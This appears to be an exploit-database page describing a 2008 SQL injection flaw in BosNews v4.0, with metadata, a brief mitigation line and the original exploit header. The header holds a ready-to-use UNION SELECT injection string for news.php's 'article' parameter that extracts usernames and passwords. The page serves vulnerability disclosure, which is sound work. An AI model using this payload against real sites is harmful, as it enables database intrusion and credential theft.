header-logo
Suggest Exploit
vendor:
BosNews
by:
Crackers_Child
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BosNews
Affected Version From: 4
Affected Version To: 4
Patch Exists: YES
Related CWE: N/A
CPE: a:bosdev:bosnews:4.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

BosNews v4.0 Remote Sql injection Exploit

This exploit allows an attacker to inject malicious SQL queries into the vulnerable BosNews v4.0 application. The vulnerable parameter is the ‘article’ parameter in the ‘news.php’ script. By appending a malicious SQL query to the vulnerable parameter, an attacker can gain access to the application’s database and extract sensitive information such as usernames and passwords.

Mitigation:

The best way to mitigate this vulnerability is to ensure that all user input is properly sanitized and validated before being used in any SQL queries.
Source

Exploit-DB raw data:

##############################################################################
##                                  By Crackers_Child
##                                 cashr00t@hotmail.com
##
##  BosNews v4.0 Remote Sql injection Exploit
##
##  Script website:http://www.bosdev.com
##
##  Exploit : " site.com/path/news.php?news=more&article=248+union%20select%200,1,username,password,4%20from%20bosdevUUS/*
##############################################################################

# milw0rm.com [2008-04-14]

Navigation

Suggest Exploit

Services By CQR